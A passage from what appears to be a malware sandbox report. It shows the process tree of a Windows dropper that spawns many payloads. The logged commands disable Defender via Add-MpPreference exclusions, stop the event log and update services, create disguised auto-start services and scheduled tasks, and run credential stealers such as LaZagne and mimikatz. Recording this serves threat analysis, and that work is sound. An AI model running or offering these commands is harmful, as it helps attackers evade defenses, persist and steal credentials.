                                                                                                                                                        5⤵
                                                                                                                                                          PID:624
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe delete "KOPWGCIF"
                                                                                                                                                        4⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:2140
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                                                                        4⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:2340
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                        4⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:1904
                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                        C:\Windows\system32\sc.exe start "KOPWGCIF"
                                                                                                                                                        4⤵
                                                                                                                                                        • Launches sc.exe
                                                                                                                                                        PID:4704
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\boost.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\boost.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:5076
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\CE5M.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\CE5M.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3948
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\All function.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\All function.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4364
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\ALL slumzick.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\ALL slumzick.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3524
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:3864
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Drops startup file
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:4508
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                                                                                                                                                        4⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:1492
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                                                                        4⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5244
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                                                                                                                                                        4⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5988
                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                                                                        4⤵
                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                        PID:5736
                                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:6028
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\CE5Mv2.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\CE5Mv2.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3744
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:4224
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:704
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4544
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Checks computer location settings
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3724
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4756
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3960
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1892
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:332
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4656
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                        12⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4352
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                          13⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:3760
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
                                                                                                                                                                            14⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:1744
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                            14⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3624
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                          13⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2392
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                        12⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4960
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                      11⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3864
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                    10⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4268
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:1788
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4512
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4224
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4044
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:400
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4364
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:3196
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\Fulloptionv2.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\Fulloptionv2.exe"
                                                                                                                                                    2⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:1272
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\._cache_Fulloptionv2.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\._cache_Fulloptionv2.exe"
                                                                                                                                                      3⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5064
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:2676
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:668
                                                                                                                                                    • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                                                      3⤵
                                                                                                                                                      • Checks computer location settings
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      PID:2340
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\._cache_Synaptics.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\._cache_Synaptics.exe" InjUpdate
                                                                                                                                                        4⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4256
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3236
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:1688
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\33.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\33.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4544
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\image.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\image.exe"
                                                                                                                                                        2⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        PID:5292
                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5460
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                                                                                                                              4⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:5864
                                                                                                                                                          • C:\ProgramData\windows\windows.exe
                                                                                                                                                            "C:\ProgramData\windows\windows.exe" {05756468-6434-465A-9313-8CAA82F857B2}
                                                                                                                                                            3⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:5932
                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                              cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\windows'
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5728
                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                "C:\Windows\explorer.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                PID:5744
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                "C:\Windows\system32\svchost.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                • Drops startup file
                                                                                                                                                                PID:5468
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\wp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\wp.exe"
                                                                                                                                                            2⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:1204
                                                                                                                                                            • C:\Windows\SYSTEM32\systeminfo.exe
                                                                                                                                                              "systeminfo.exe"
                                                                                                                                                              3⤵
                                                                                                                                                              • Gathers system information
                                                                                                                                                              PID:5648
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5756
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\LaZagne.exe"
                                                                                                                                                                3⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Accesses Microsoft Outlook profiles
                                                                                                                                                                • outlook_office_path
                                                                                                                                                                • outlook_win_path
                                                                                                                                                                PID:5916
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a\mimikatz.exe"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3128
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\gp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\gp.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5924
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4756
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\Akagi64.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\Akagi64.exe"
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:3288
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\chrome_93.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\chrome_93.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:5948
                                                                                                                                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          PID:644
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4800
                                                                                                                                                                            • C:\Windows\system32\wusa.exe
                                                                                                                                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:2252
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2488
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:5444
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:3204
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:5064
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:232
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:5804
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:1376
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:4972
                                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Power Settings
                                                                                                                                                                              PID:3716
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:2408
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1916
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:4236
                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                              C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Launches sc.exe
                                                                                                                                                                              PID:1364
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\msgde.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\msgde.exe"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:1268
                                                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                "schtasks" /create /tn "msgde" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                PID:1688
                                                                                                                                                                              • C:\Windows\system32\SubDir\Client.exe
                                                                                                                                                                                "C:\Windows\system32\SubDir\Client.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3584
                                                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                    "schtasks" /create /tn "msgde" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:5592
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\OneDrive.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\OneDrive.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:332
                                                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                    "schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                    PID:5280
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5084
                                                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                        "schtasks" /create /tn "Microsoft OneDrive" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Onedrive\Onedrive.exe" /rl HIGHEST /f
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                        PID:4184
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\121.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\121.exe"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1368
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\12.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\12.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2536
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\EZFN%20op%20cheats.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\EZFN%20op%20cheats.exe"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3992
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\vncgroups.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\vncgroups.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5752
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\blq.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\blq.exe"
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:4244
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\._cache_blq.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\._cache_blq.exe"
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4504
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 1 && del /f/q "C:\Users\Admin\AppData\Local\Temp\a\._cache_blq.exe"
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                    PID:5348
                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                      ping 127.0.0.1 -n 1
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                      PID:4516
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\swift-bootstrapper.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\swift-bootstrapper.exe"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5812
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\22.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\22.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3704
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\expt64.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\expt64.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:2988
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Out.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Out.exe"
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2288
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 592
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:6016
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\zxc.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\zxc.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:3264
                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 848
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                            PID:3344
